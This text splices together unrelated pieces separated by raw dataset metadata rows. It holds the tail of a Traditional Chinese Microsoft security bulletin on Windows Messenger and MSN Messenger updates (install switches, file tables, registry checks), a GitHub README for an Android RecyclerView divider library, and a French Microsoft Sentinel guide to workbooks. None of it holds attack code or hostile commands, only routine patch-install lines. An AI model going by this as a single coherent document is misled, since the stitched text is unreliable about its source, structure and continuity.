\[內容\]。 **注意:**根據作業系統的版本或已安裝之程式,部分列於檔案資訊表格中的檔案可能並未被安裝。 5. 在 \[版本\] 索引標籤中,與適當檔案資訊表格中記錄的版本加以比較,以找出安裝在電腦上的檔案的版本。 **注意:**在安裝時,檔案版本以外的屬性可能會變更。 在驗證更新程式安裝是否成功時,比對檔案資訊表中列出的其他檔案屬性並不是妥當的做法。 此外,在某些情況下,檔案的名稱在安裝時可能會有所變更。 如果缺少檔案或版本資訊,請採用其他可用的方法來驗證更新程式的安裝情形。 - **登錄機碼驗證** 您也可以查看下列登錄機碼,來確認此安全性更新程式所安裝的檔案。 Windows 2000、Windows XP 及 Windows Server 2003 的 Microsoft Windows Media Player 9 系列: HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows Media Player\\wm885492 **注意:**此登錄機碼可能未包含完整的安裝檔案清單。 此外,當系統管理員或 OEM 將 885492 安全性更新整合或匯集到 Windows 安裝來源檔時,可能未正確建立這個登錄機碼。 #### Windows XP Service Pack 1 中的 Microsoft Windows Messenger 4.7.0.2009 **必要條件** 此安全性更新程式需要安裝 Microsoft Windows Messenger 4.7.0.2009 版 (在 Windows XP Service Pack 1 上使用時) **未來將包含於 Service Pack 中的內容:** 此問題的更新程式會包含在未來的 Service Pack 或更新彙總套件中。 **安裝資訊** 這個安全性更新支援以下的安裝參數: /**Q** 指定在檔案解壓縮時採用無訊息模式 (不出現提示訊息)。 /**Q:U** 指定採用使用者無訊息模式,會對使用者顯示一些對話方塊。 /**Q:A** 指定採用系統管理員無訊息模式,不會對使用者顯示任何對話方塊。 /**T**: **&lt;full path&gt;** 指定解壓縮檔案的目標資料夾。 /**C** 解壓縮檔案,但是並不進行安裝。 如果未指定 /**T**: 路徑,系統會出現提示訊息,要求您提供目標資料夾。 /**C**: **&lt;Cmd&gt;** 覆寫作者定義的安裝命令。 指定 Setup .inf 或 .exe 檔案的路徑和名稱。 /**R:N** 安裝之後絕不重新啟動電腦。 /**R:I** 遇到需要重新啟動電腦的狀況時,提示使用者重新啟動電腦,除非是與 **/Q:A** 搭配使用。 /**R:A** 安裝後永遠重新啟動電腦。 /**R:S** 安裝完成後,不提示使用者便重新啟動電腦。 **注意:**並非所有的更新程式均適用這些參數。 如果某個參數無法使用,表示該功能是正常安裝該更新程式所不可或缺的功能。 此外也不支援使用 /**N:V** 參數,因為尚未支援且可能會導致系統無法重新啟動。 如果安裝失敗,請洽詢支援人員瞭解失敗的原因。 有關支援的安裝參數的其他資訊,請參閱 [Microsoft 知識庫文件編號 197147](https://support.microsoft.com/kb/197147) (英文)。 **部署資訊** 使用 Windows 2000 Service Pack 3、Windows 2000 Service Pack 4、Windows XP Service Pack 1 或 Windows Server 2003 時,如果要在不需要使用者介入,而且不要強制重新開機的情況下安裝安全性更新程式,請在命令提示字元下使用下列命令: **WindowsMessenger-KB887472-PreXPSP2-ENU /q:a /r:n** **重新開機需求** 在某些情況下,此更新程式不需要重新開機。 安裝程式會停止所需服務,然後套用更新,再重新啟動服務。 不過,如果必要的服務無法停止,或是必要的檔案正在使用中,更新程式就會要求重新開機。 在此情況下,系統會出現訊息提示您重新開機。 **移除資訊** 此更新程式無法解除安裝。 **檔案資訊** 本更新程式的英文版本具有下表列出 (或更新) 的檔案屬性。 這些檔案的日期及時間均使用 Coordinated Universal Time (UTC)。 當您檢視檔案資訊時,它會轉換為當地時間。 如想知道 UTC 及當地時間的時差,請使用 \[控制台\] 中的 \[日期和時間\] 工具的 \[時區\] 索引標籤。 Windows XP Service Pack 1 中的 Windows Messenger 4.7.0.2009 版: | 檔案名稱 | 版本 | 日期 | 時間 | 大小 | |------------|------------|-------------|-------|-----------| | Msmsgs.exe | 4.7.0.2010 | 16-Nov-2004 | 00:18 | 1,670,144 | **確認更新的安裝** - **Microsoft Baseline Security Analyzer** 如果要確認安全性更新已經安裝到受影響的系統,您可以使用 Microsoft Baseline Security Analyzer (MBSA) 工具。 這項工具讓系統管理員能夠掃描本機和遠端系統,找出遺漏的安全性更新,以及常見的錯誤安全性設定。 如需關於 MBSA 的詳細資訊,請造訪 [Microsoft Baseline Security Analyzer 網站](https://go.microsoft.com/fwlink/?linkid=21134) (英文)。 - **檔案版本驗證** **注意:**由於 Microsoft Windows 的版本眾多,您電腦上實際執行的步驟可能會與此處描述的不同。 如遇到不同的狀況,請參閱產品的說明文件以完成這些步驟。 1. 按一下 \[開始\],然後按一下 \[搜尋\]。 2. 在 \[搜尋結果\] 窗格中,在 \[搜尋小幫手\] 下按一下 \[所有檔案和資料夾\]。 3. 在 \[部份或完整的檔案名稱\] 方塊中,輸入適當檔案資訊表中的檔案名稱,再按一下 \[搜尋\]。 4. 在檔案清單中,用滑鼠右鍵按一下所需檔案名稱 (名稱來自適當檔案資訊表),再按 \[內容\]。 **注意:**視所安裝的作業系統或程式的版本而定,檔案資訊表中列出的檔案未必會全部安裝。 1. 在 \[版本\] 索引標籤上,比較檔案版本與適當檔案資訊表中記錄的版本,判斷您電腦上安裝的檔案版本。 **注意:**在安裝時,檔案版本以外的屬性可能會變更。 在驗證更新程式安裝是否成功時,比對檔案資訊表中列出的其他檔案屬性並不是妥當的做法。 此外,在某些情況下,檔案的名稱在安裝時可能會有所變更。 如果缺少檔案或版本資訊,請採用其他可用的方法來驗證更新程式的安裝情形。 - **登錄機碼驗證** 您也可以確認下列登錄機碼是否含有資料值為 1 的 "Installed" DWORD 值,以檢查此安全性更新所安裝的檔案。 HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{5945c046-1e7d-11d1-bc44-00c04fd912be} **注意:**這些登錄機碼可能未包含完整的安裝檔案清單。 此外,當系統管理員或 OEM 將 887472 安全性更新整合或匯集到 Windows 安裝來源檔時,可能未正確建立這些登錄機碼。 #### Windows XP Service Pack 2 中的 Microsoft Windows Messenger 4.7.0.3000 版 **必要條件** 此安全性更新程式需要安裝 Microsoft 4.7.0.3000 (在 Windows XP Service Pack 2 上使用時) **未來將包含於 Service Pack 中的內容:** 此問題的更新程式會包含在未來的 Service Pack 或更新彙總套件中。 **安裝資訊** 這個安全性更新支援以下的安裝參數: **/help**             顯示命令列選項 **安裝模式** **/quiet**             無訊息模式 (無使用者互動,不顯示任何訊息) **/passive**            自動安裝模式 (僅顯示進度列) **/uninstall**          解除安裝套件 **重新啟動選項** **/norestart**          安裝完成時不要重新開機 **/forcerestart**      安裝之後重新開機 **特殊選項** **/l**                        列出安裝的 Windows Hotfix 或更新的套件 **/o**                       不先提示,直接覆寫 OEM 檔案 **/n**                       不備份解除安裝所需的檔案 **/f**                        當電腦關機時,強制其他程式結束 **/integrate:path**  將更新整合至位於指定路徑的 Windows 來源檔中 **/extract**             不啟動安裝程式,直接解壓縮檔案 **注意:**您可以在同一個命令中合併使用這些參數。 為符合回溯相容性,安全性更新程式也支援舊版安裝公用程式使用的安裝參數。 有關支援的安裝參數的其他資訊,請參閱 [Microsoft 知識庫文件編號 262841](https://support.microsoft.com/kb/262841)。 如需更多關於 Update.exe 安裝程式的相關資訊,請造訪 [Microsoft TechNet 網站](https://go.microsoft.com/fwlink/?linkid=38951) (英文)。 **部署資訊** 在 Windows XP Service Pack 2 上,如想在不需要使用者介入的狀況下安裝安全性更新,請在命令提示字元使用下列命令: **WindowsXP-KB887472-x86-enu /passive /quiet** 在 Windows XP Service Pack 2 上,如想在不強制系統重新開機的狀況下安裝安全性更新,請在命令提示字元下輸入下列命令: **WindowsXP-KB887472-x86-enu /norestart** 如需如何透過 Software Update Services 部署這個安全性更新的詳細資訊,請造訪 [Software Update Services 網站](https://www.microsoft.com/taiwan/windowsserversystem/sus/susoverview.mspx)。 **重新開機需求** 在某些情況下,此更新程式不需要重新開機。 安裝程式會停止所需服務,然後套用更新,再重新啟動服務。 不過,如果必要的服務無法停止,或是必要的檔案正在使用中,更新程式就會要求重新開機。 在此情況下,系統會出現訊息提示您重新開機。 **移除資訊** 如果要移除這個安全性更新程式,請使用 \[控制台\] 中的 \[新增或移除程式\] 工具。 如為 Windows XP Service Pack 2:系統管理員也可使用 Spuninst.exe 公用程式移除此安全性更新程式。 Spuninst.exe 位於 %Windir%\\$NTUninstallKB887472$\\Spuninst 資料夾中。 Spuninst.exe 公用程式支援以下的安裝參數: **/help**             顯示命令列選項 **安裝模式** **/quiet**             無訊息模式 (無使用者互動,不顯示任何訊息) **/passive**            自動安裝模式 (僅顯示進度列) **重新啟動選項** **/norestart**          安裝完成時不要重新開機 **/forcerestart**      安裝之後重新開機 **特殊選項** **/f**                        當電腦關機時,強制其他程式結束 **檔案資訊** 本更新程式的英文版本具有下表列出 (或更新) 的檔案屬性。 這些檔案的日期及時間均使用 Coordinated Universal Time (UTC)。 當您檢視檔案資訊時,它會轉換為當地時間。 如想知道 UTC 及當地時間的時差,請使用 \[控制台\] 中的 \[日期和時間\] 工具的 \[時區\] 索引標籤。 Windows XP Service Pack 2 中的 Windows Messenger 4.7.0.3000 版: | 檔案名稱 | 版本 | 日期 | 時間 | 大小 | 資料夾 | |------------|------------|-------------|-------|-----------|--------| | Msmsgs.exe | 4.7.0.3001 | 13-Oct-2004 | 16:24 | 1,694,208 | SP2GDR | | Msmsgs.exe | 4.7.0.3001 | 13-Oct-2004 | 16:21 | 1,694,208 | SP2QFE | **確認更新的安裝** - **Microsoft Baseline Security Analyzer** 如果要確認安全性更新已經安裝到受影響的系統,您可以使用 Microsoft Baseline Security Analyzer (MBSA) 工具。 這項工具讓系統管理員能夠掃描本機和遠端系統,找出遺漏的安全性更新,以及常見的錯誤安全性設定。 如需關於 MBSA 的詳細資訊,請造訪 [Microsoft Baseline Security Analyzer 網站](https://go.microsoft.com/fwlink/?linkid=21134) (英文)。 - **檔案版本驗證** **注意:**由於 Microsoft Windows 的版本眾多,您電腦上實際執行的步驟可能會與此處描述的不同。 如遇到不同的狀況,請參閱產品的說明文件以完成這些步驟。 1. 按一下 \[開始\],然後按一下 \[搜尋\]。 2. 在 \[搜尋結果\] 窗格中,在 \[搜尋小幫手\] 下按一下 \[所有檔案和資料夾\]。 3. 在 \[部份或完整的檔案名稱\] 方塊中,輸入適當檔案資訊表中的檔案名稱,再按一下 \[搜尋\]。 4. 在檔案清單中,用滑鼠右鍵按一下適當檔案資訊表格中某個檔案名稱,然後按一下 \[內容\]。 **注意:**根據作業系統的版本或已安裝之程式,部分列於檔案資訊表格中的檔案可能並未被安裝。 5. 在 \[版本\] 索引標籤中,與適當檔案資訊表格中記錄的版本加以比較,以找出安裝在電腦上的檔案的版本。 **注意:**在安裝時,檔案版本以外的屬性可能會變更。 在驗證更新程式安裝是否成功時,比對檔案資訊表中列出的其他檔案屬性並不是妥當的做法。 此外,在某些情況下,檔案的名稱在安裝時可能會有所變更。 如果缺少檔案或版本資訊,請採用其他可用的方法來驗證更新程式的安裝情形。 - **登錄機碼驗證** 您也可以查看下列登錄機碼,確認此安全性更新程式所安裝的檔案。 HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows XP\\SP3\\KB887472\\Filelist **注意:**這些登錄機碼可能未包含完整的安裝檔案清單。 此外,當系統管理員或 OEM 將 887472 安全性更新整合或匯集到 Windows 安裝來源檔時,可能未正確建立這些登錄機碼。 #### Microsoft Windows Messenger 5.0 **必要條件** 此安全性更新程式需要 Microsoft Windows 2000 Service Pack 4、Windows Server 2003、Windows XP Service Pack 1 或 Windows XP Service Pack 2。 **安裝資訊** 此安全性更新程式是以 [Windows Installer 3.0 版](https://msdn.microsoft.com/library/en-us/msi/setup/what_s_new_in_windows_installer_version_3_0.asp)所封裝。 如需更多資訊,請參閱[產品說明文件](https://msdn.microsoft.com/library/en-us/msi/setup/standard_installer_command_line_options.asp)。 **重新開機需求** 在某些情況下,此更新程式不需要重新開機。 安裝程式會停止所需服務,然後套用更新,再重新啟動服務。 不過,如果必要的服務無法停止,或是必要的檔案正在使用中,更新程式就會要求重新開機。 在此情況下,系統會出現訊息提示您重新開機。 **移除資訊** 如果要移除這個安全性更新程式,請使用 \[控制台\] 中的 \[新增或移除程式\] 工具。 **檔案資訊** 本更新程式的英文版本具有下表列出 (或更新) 的檔案屬性。 這些檔案的日期及時間均使用 Coordinated Universal Time (UTC)。 當您檢視檔案資訊時,它會轉換為當地時間。 如想知道 UTC 及當地時間的時差,請使用 \[控制台\] 中的 \[日期和時間\] 工具的 \[時區\] 索引標籤。 Windows 2000 Service Pack 4、Windows Server 2003、Windows XP Service Pack 1、Windows XP Service Pack 2 或 Windows XP Tablet PC Edition 中的 Windows Messenger 5.0: | 檔案名稱 | 版本 | 日期 | 時間 | 大小 | |------------|------|-------------|-------|-----------| | msmsgs.exe | 5.1 | 05-Aug-2003 | 17:29 | 1,578,160 | **確認更新的安裝** - **Microsoft Baseline Security Analyzer** 如果要確認安全性更新已經安裝到受影響的系統,您可以使用 Microsoft Baseline Security Analyzer (MBSA) 工具。 這項工具讓系統管理員能夠掃描本機和遠端系統,找出遺漏的安全性更新,以及常見的錯誤安全性設定。 如需關於 MBSA 的詳細資訊,請造訪 [Microsoft Baseline Security Analyzer 網站](https://go.microsoft.com/fwlink/?linkid=21134) (英文)。 - **檔案版本驗證** **注意:**由於 Microsoft Windows 的版本眾多,您電腦上實際執行的步驟可能會與此處描述的不同。 如遇到不同的狀況,請參閱產品的說明文件以完成這些步驟。 1. 按一下 \[開始\],然後按一下 \[搜尋\]。 2. 在 \[搜尋結果\] 窗格中,在 \[搜尋小幫手\] 下按一下 \[所有檔案和資料夾\]。 3. 在 \[部份或完整的檔案名稱\] 方塊中,輸入適當檔案資訊表中的檔案名稱,再按一下 \[搜尋\]。 4. 在檔案清單中,用滑鼠右鍵按一下所需檔案名稱 (名稱來自適當檔案資訊表),再按 \[內容\]。 **注意:**視所安裝的作業系統或程式的版本而定,檔案資訊表中列出的檔案未必會全部安裝。 1. 在 \[版本\] 索引標籤上,比較檔案版本與適當檔案資訊表中記錄的版本,判斷您電腦上安裝的檔案版本。 **注意:**在安裝時,檔案版本以外的屬性可能會變更。 在驗證更新程式安裝是否成功時,比對檔案資訊表中列出的其他檔案屬性並不是妥當的做法。 此外,在某些情況下,檔案的名稱在安裝時可能會有所變更。 如果缺少檔案或版本資訊,請採用其他可用的方法來驗證更新程式的安裝情形。 #### MSN Messenger 6.2 **必要條件** 此安全性更新程式需要 MSN Messenger 6.2。 **重新開機需求** 此更新程式可能需要重新啟動電腦。 **移除資訊** 此更新程式無法解除安裝。 **確認更新的安裝** 若要確認受影響系統上是否安裝安全性更新程式,請執行下列步驟: 1. 在 MSN Messenger 中,依序按一下 \[說明\] 和 \[關於\]。 2. 查看版本號碼。 如果版本號碼是 6.2.205 或更新版本,表示更新程式已順利安裝。 ### 其他資訊 **感謝** Microsoft [感謝](https://go.microsoft.com/fwlink/?linkid=21127)下列人士協助我們一同保護我們的客戶: - [Core Security Technologies](https://www1.corest.com/home/home.php) 的 Carlos Sarraute 通報 MSN Messenger PNG 處理弱點 (CAN-2004-0597)。 **取得其他安全性更新:** 其他安全性問題的更新可由下列位置取得: - 安裝性更新可以從 [Microsoft 下載中心](https://www.microsoft.com/taiwan/download/)取得, 您也可以利用 "security\_patch" 關鍵字搜尋輕易地找到安全性更新。 - 使用者平台的更新程式可以從 [Windows Update 網站](https://go.microsoft.com/fwlink/?linkid=21130)取得。 **支援:** - 美國 及加拿大地區客戶可電洽 1-866-PCSAFETY [Microsoft 技術支援服務](https://go.microsoft.com/fwlink/?linkid=21131)以取得技術支援。 與安全性更新有關的支援電話不另外收費。 - 不同國家的客戶,可以從當地的 Microsoft 分公司取得支援。 與安全性更新有關的支援電話不另外收費。 如需更多關於連絡 Microsoft 技術支援的資訊,請造訪[世界各地技術支援網站](https://go.microsoft.com/fwlink/?linkid=21155)。 **安全性資源:** - [Microsoft TechNet 資訊安全](https://www.microsoft.com/taiwan/technet/security/default.mspx)網站提供了有關 Microsoft 產品安全性的其他資訊。 - [Microsoft Software Update Services](https://www.microsoft.com/taiwan/windowsserversystem/sus/default.mspx) - [Microsoft Baseline Security Analyzer](https://go.microsoft.com/fwlink/?linkid=21134) (MBSA) - [Windows Update](https://go.microsoft.com/fwlink/?linkid=21130) - Windows Update 目錄:如需更多關於 Windows Update 目錄的資訊,請參閱 [Microsoft 知識庫文件編號 323166](https://support.microsoft.com/kb/323166)。 - [Office Update](https://go.microsoft.com/fwlink/?linkid=21135) **Software Update Services:** Microsoft Software Update Services (SUS) 能讓系統管理員以迅速可靠的方式,針對 Windows 2000 和 Windows Server 2003 伺服器以及執行 Windows 2000 Professional 或 Windows XP Professional 的桌面系統,部署最新的重要更新程式及安全性更新程式。 如需如何透過 Software Update Services 部署這個安全性更新的詳細資訊,請造訪 [Software Update Services 網站](https://www.microsoft.com/taiwan/windowsserversystem/sus/default.mspx)。 **Systems Management Server:** Microsoft Systems Management Server (SMS) 提供了深具彈性的企業解決方案,能夠對更新程式進行方便的管理。 透過 SMS,系統管理員能判斷有哪些 Windows 系統需要安全性更新,並控制更新程式在企業中的部署,同時將對使用者造成的干擾降到最低。 如需更多關於系統管理員如何使用 SMS 2003 部署安全性更新的資訊,請造訪 [SMS 2003 的安全性補充程式管理網站](https://www.microsoft.com/taiwan/smserver/evaluation/capabilities/patch.htm)。 SMS 2.0 使用者也可以利用 [SMS 軟體更新服務功能套件](https://go.microsoft.com/fwlink/?linkid=33340)來協助部署安全性更新。 如需關於 SMS 的詳細資訊,請造訪 [SMS 網站](https://www.microsoft.com/taiwan/smserver/default.htm)。 **注意:**SMS 使用 Microsoft Baseline Security Analyzer及 Microsoft Office Detection Tool,為安全性公告更新的偵測及部署作業提供相當廣泛的支援。 不過這些工具可能無法偵測部分的軟體更新。 在這些情況中,系統管理員可以利用 SMS 的清查功能,判斷特定系統所需要的更新程式。 如需這個程序的詳細資訊,請造訪這個[網站](https://go.microsoft.com/fwlink/?linkid=33341)。 某些安全性更新程式在電腦重新啟動之後,會需要系統管理員的權限。 系統管理員可以用 Elevated Rights Deployment Tool (隨 [SMS 2003 Administration Feature Pack](https://go.microsoft.com/fwlink/?linkid=33387) (英文) 和 [SMS 管理功能套件](https://go.microsoft.com/fwlink/?linkid=21161) (英文) 提供) 來安裝這些更新。 **免責聲明:** Microsoft 知識庫 (Microsoft Knowledge Base) 中的資訊係以其「現狀」提供,並不提供任何形式之擔保。 Microsoft 不做任何明示或默示的責任擔保,包括適售性以及適合某特定用途之擔保責任。 無論任何情況下的損害,Microsoft Corporation 及其供應商皆不負任何法律責任,包括直接、間接、偶發、衍生性、所失業務利益或特殊損害。即使 Microsoft Corporation 及其供應商已被告知此類損害的可能性亦不負任何責任。 某些地區不允許排除及限制衍生性或附隨損害賠償責任,因此前述限制不適用於這些地區。 **修訂:** - V1.0 (2005 年 2 月 8 日):公告發行 *Built at 2014-04-18T01:50:00Z-07:00*
39.487885
491
0.736215
yue_Hant
0.991443
6f559108ff5e2dad36f7b60cdc1accdc66e57ee9
4,456
md
Markdown
README.md
intrications/RecyclerView-FlexibleDivider
7ee2021734a8224f507849c3a5701458b1ca4d29
[ "Apache-2.0" ]
3
2015-11-04T03:54:49.000Z
2015-11-04T03:54:57.000Z
README.md
Cc-go/RecyclerView-FlexibleDivider
7ee2021734a8224f507849c3a5701458b1ca4d29
[ "Apache-2.0" ]
null
null
null
README.md
Cc-go/RecyclerView-FlexibleDivider
7ee2021734a8224f507849c3a5701458b1ca4d29
[ "Apache-2.0" ]
1
2021-03-25T02:11:06.000Z
2021-03-25T02:11:06.000Z
# RecyclerView-FlexibleDivider [![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-RecyclerView--FlexibleDivider-brightgreen.svg?style=flat)](https://android-arsenal.com/details/1/1418) [![License](https://img.shields.io/badge/license-Apache%202-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0) [![Download](https://api.bintray.com/packages/yqritc/maven/recyclerview-flexibledivider/images/download.svg)](https://bintray.com/yqritc/maven/recyclerview-flexibledivider/_latestVersion) Android library providing simple way to control divider items of RecyclerView ![Simple Divider](/sample/sample1.gif) ![Complex Divider](/sample/sample2.gif) # Release Note [Release Note] (https://github.com/yqritc/RecyclerView-FlexibleDivider/releases) # Gradle ``` repositories { jcenter() } dependencies { compile 'com.yqritc:recyclerview-flexibledivider:1.2.6' } ``` # Usage The following is the simplest usage. Drawing a divider drawable retrieved from android.R.attr.listDivider between each cell. ``` RecyclerView recyclerView = (RecyclerView) findViewById(R.id.recyclerview); recyclerView.addItemDecoration(new HorizontalDividerItemDecoration.Builder(this).build()) ``` If you want to set color, size and margin values, you can specify as the followings. ``` RecyclerView recyclerView = (RecyclerView) findViewById(R.id.recyclerview); recyclerView.addItemDecoration( new HorizontalDividerItemDecoration.Builder(this) .color(Color.RED) .sizeResId(R.dimen.divider) .marginResId(R.dimen.leftmargin, R.dimen.rightmargin) .build()); ``` Instead of setting color and size, you can set paint object. ``` Paint paint = new Paint(); paint.setStrokeWidth(5); paint.setColor(Color.BLUE); paint.setAntiAlias(true); paint.setPathEffect(new DashPathEffect(new float[]{25.0f, 25.0f}, 0)); recyclerView.addItemDecoration( new HorizontalDividerItemDecoration.Builder(this).paint(paint).build()); ``` Also 9patch drawable can be used for drawing divider. ``` RecyclerView recyclerView = (RecyclerView) findViewById(R.id.recyclerview); recyclerView.addItemDecoration(new HorizontalDividerItemDecoration.Builder(this) .drawable(R.drawable.sample) .size(15) .build()); ``` If you want to customize divider depending on the position, implement the following interfaces. ### List of provider The following providers can be implemented and controllable for each divider drawn between cells. - ColorProvider Provide color for divider - PaintProvider Provide paint object for divider line to draw. - DrawableDivider Provide drawable object for divider line - SizeProvider Provide height for horizontal divider, width for vertical divider. - VisibilityProvider Enables you to control the visibility of dividers. - MarginProvider for horizontal divider (vertical list) Enables you to specify left and right margin of divider. - MarginProvider for vertical divider (horizontal list) Enables you to specify top and bottom margin of divider. Please refer to ComplexAdapter class in the [sample](/sample/src/main/java/com/yqritc/recyclerviewflexibledivider/sample) for the usage of providers in detail. ### Optional The following method can be used if you want to draw divider line at the end of last item in RecyclerView. If you enable this, the range of position parameter of providers listed above is 0 to itemCount-1. Otherwise, the range is 0 to itemCount-2. ``` FlexibleDividerDecoration.Builder.showLastDivider ``` ### Note - When neither of color, paint, drawable is set, default divider retrieved from android.R.attr.listDivider will be used. - When you set Paint, you must use setColor and setStrokeWidth methods of paint class. - If you want to use DashPathEffect, please note the following issue. https://code.google.com/p/android/issues/detail?id=29944 # License ``` Copyright 2015 yqritc Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ```
35.365079
187
0.770422
eng_Latn
0.915683
6f56f0bc392d011669e8e015954fb3b132efb9e8
9,046
md
Markdown
articles/sentinel/monitor-your-data.md
KreizIT/azure-docs.fr-fr
dfe0cb93ebc98e9ca8eb2f3030127b4970911a06
[ "CC-BY-4.0", "MIT" ]
1
2021-03-12T23:37:08.000Z
2021-03-12T23:37:08.000Z
articles/sentinel/monitor-your-data.md
KreizIT/azure-docs.fr-fr
dfe0cb93ebc98e9ca8eb2f3030127b4970911a06
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/sentinel/monitor-your-data.md
KreizIT/azure-docs.fr-fr
dfe0cb93ebc98e9ca8eb2f3030127b4970911a06
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Visualisez vos données à l'aide des classeurs Azure Monitor dans Microsoft Sentinel | Microsoft Docs description: Apprenez à visualiser vos données à l'aide de classeurs dans Microsoft Sentinel. services: sentinel documentationcenter: na author: yelevin manager: rkarlin editor: '' ms.service: microsoft-sentinel ms.subservice: microsoft-sentinel ms.devlang: na ms.topic: how-to ms.tgt_pltfrm: na ms.workload: na ms.date: 11/09/2021 ms.author: yelevin ms.custom: ignite-fall-2021 ms.openlocfilehash: 525f67a7c9284a9ac78c388e52041d7895032104 ms.sourcegitcommit: 2ed2d9d6227cf5e7ba9ecf52bf518dff63457a59 ms.translationtype: HT ms.contentlocale: fr-FR ms.lasthandoff: 11/16/2021 ms.locfileid: "132522609" --- # <a name="use-azure-monitor-workbooks-to-visualize-and-monitor-your-data"></a>Utiliser des workbooks Azure Monitor pour visualiser et superviser vos données [!INCLUDE [Banner for top of topics](./includes/banner.md)] Une fois que vous avez [connecté vos sources de données](quickstart-onboard.md) à Microsoft Sentinel, vous pouvez visualiser et surveiller les données à l'aide de l'adoption par Microsoft Sentinel des classeurs Azure Monitor, qui offrent une grande souplesse dans la création de tableaux de bord personnalisés. Bien que les Workbooks soient affichés différemment dans Microsoft Sentinel, il peut être utile pour vous de voir comment [créer des rapports interactifs avec les Workbooks Azure Monitor](../azure-monitor/visualize/workbooks-overview.md). Microsoft Sentinel vous permet de créer des workbooks personnalisés à partir de vos données. Il est également fourni avec des modèles de classeurs intégrés qui vous permettent d'obtenir rapidement des informations sur vos données dès que vous connectez une source de données. Cet article décrit comment visualiser vos données dans Microsoft Sentinel. > [!div class="checklist"] > * Utiliser des classeurs intégrés > * Créer des classeurs ## <a name="prerequisites"></a>Prérequis Vous devez avoir au moins les droits de **lecteur de Workbook** ou de **contributeur de Workbook** sur le groupe de ressources de l'espace de travail Microsoft Sentinel. > [!NOTE] > Les workbooks que vous pouvez voir dans Microsoft Sentinel sont enregistrés dans le groupe de ressources de l'espace de travail Microsoft Sentinel et sont marqués par l'espace de travail dans lequel ils ont été créés. ## <a name="use-built-in-workbooks"></a>Utiliser des classeurs intégrés 1. Allez à **Workbooks** et sélectionnez ensuite **Modèles** pour voir la liste complète des workbooks intégrés à Microsoft Sentinel. Pour voir quels types de données sont pertinents pour les types de données que vous avez connectés, le champ **Types de données requis** de chaque workbook indiquera le type de données à côté d'une coche verte si vous transmettez déjà les données pertinentes à Microsoft Sentinel. [ ![Accédez aux classeurs.](media/tutorial-monitor-data/access-workbooks.png) ](media/tutorial-monitor-data/access-workbooks.png#lightbox) 1. Sélectionnez **Afficher le modèle** pour voir le modèle rempli avec vos données. 1. Pour modifier le classeur, sélectionnez **Enregistrer**, puis sélectionnez l’emplacement où vous souhaitez enregistrer le fichier JSON du modèle. > [!NOTE] > Cette opération crée une ressource Azure basée sur le modèle associé et enregistre le fichier JSON du modèle sans les données. 1. Sélectionnez **Afficher le classeur enregistré**. [ ![Affichez les classeurs.](media/tutorial-monitor-data/workbook-graph.png) ](media/tutorial-monitor-data/workbook-graph.png#lightbox) Sélectionnez le bouton **Modifier** de la barre d’outils du classeur pour personnaliser ce dernier en fonction de vos besoins. Lorsque vous avez terminé, sélectionnez **Enregistrer** pour enregistrer vos paramètres. Pour plus d’informations, consultez [Créer des rapports interactifs avec les classeurs Azure Monitor](../azure-monitor/visualize/workbooks-overview.md). > [!TIP] > Pour cloner votre classeur, sélectionnez **Modifier**, puis sélectionnez **Enregistrer sous**, en veillant à enregistrer le classeur sous un autre nom, dans le même abonnement et le même groupe de ressources. > Les classeurs clonés sont affichés sous l’onglet **Mes classeurs**. > ## <a name="create-new-workbook"></a>Créer un classeur 1. Accédez à **Classeurs**, puis sélectionnez **Ajouter un classeur** pour créer un classeur entièrement nouveau. [ ![Nouveau classeur.](media/tutorial-monitor-data/create-workbook.png) ](media/tutorial-monitor-data/create-workbook.png#lightbox) 1. Pour modifier le classeur, sélectionnez **Modifier**, puis ajoutez du texte, des requêtes et des paramètres selon vos besoins. Pour plus d’informations sur la personnalisation du classeur, consultez [Créer des rapports interactifs avec les classeurs Azure Monitor](../azure-monitor/visualize/workbooks-overview.md). 1. Quand vous créez une requête, assurez-vous que l’option **Source de données** est définie sur **Journaux** et **Type de ressource** sur **Log Analytics**, puis choisissez le ou les espaces de travail appropriés. 1. Après avoir créé votre workbook, enregistrez-le en veillant à l'enregistrer sous le groupe d'abonnement et de ressources de votre espace de travail Microsoft Sentinel. 1. Si vous voulez autoriser d’autres personnes de votre organisation à utiliser le classeur, sous **Enregistrer dans**, sélectionnez **Rapports partagés**. Si vous souhaitez restreindre l’usage de ce classeur à vous-seul, sélectionnez **Mes rapports**. 1. Pour passer d’un classeur à un autre dans votre espace de travail, sélectionnez **Ouvrir** ![Icône d’ouverture d’un classeur.](./media/tutorial-monitor-data/switch.png) dans la barre d’outils de n’importe quel classeur. L’écran bascule vers une liste de classeurs vers lesquels vous pouvez basculer. Sélectionnez le classeur que vous souhaitez ouvrir : [ ![Basculez entre les classeurs.](media/tutorial-monitor-data/switch-workbooks.png) ](media/tutorial-monitor-data/switch-workbooks.png#lightbox) ## <a name="refresh-your-workbook-data"></a>Actualiser les données de votre classeur Actualisez votre classeur pour afficher les données mises à jour. Dans la barre d’outils, sélectionnez l’une des options suivantes : - :::image type="icon" source="media/whats-new/manual-refresh-button.png" border="false"::: **Actualiser**, pour actualiser manuellement les données de votre classeur. - :::image type="icon" source="media/whats-new/auto-refresh-workbook.png" border="false"::: **Actualisation automatique**, pour définir l’actualisation automatique de votre classeur à un intervalle configuré. - Les intervalles d’actualisation automatique s’échelonnent entre **5 minutes** et **1 jour**. - L’actualisation automatique est suspendue lorsque vous modifiez un classeur, et les intervalles sont redémarrés chaque fois que vous revenez en mode d’affichage à partir du mode d’édition. - Les intervalles d’actualisation automatique sont également redémarrés si vous actualisez manuellement vos données. > [!TIP] > Par défaut, l’actualisation automatique est désactivée. Pour optimiser les performances, l’actualisation automatique est également désactivée chaque fois que vous fermez un classeur, et elle ne s’exécute pas en arrière-plan. Activez l’actualisation automatique en fonction de vos besoins la prochaine fois que vous ouvrirez le classeur. > ## 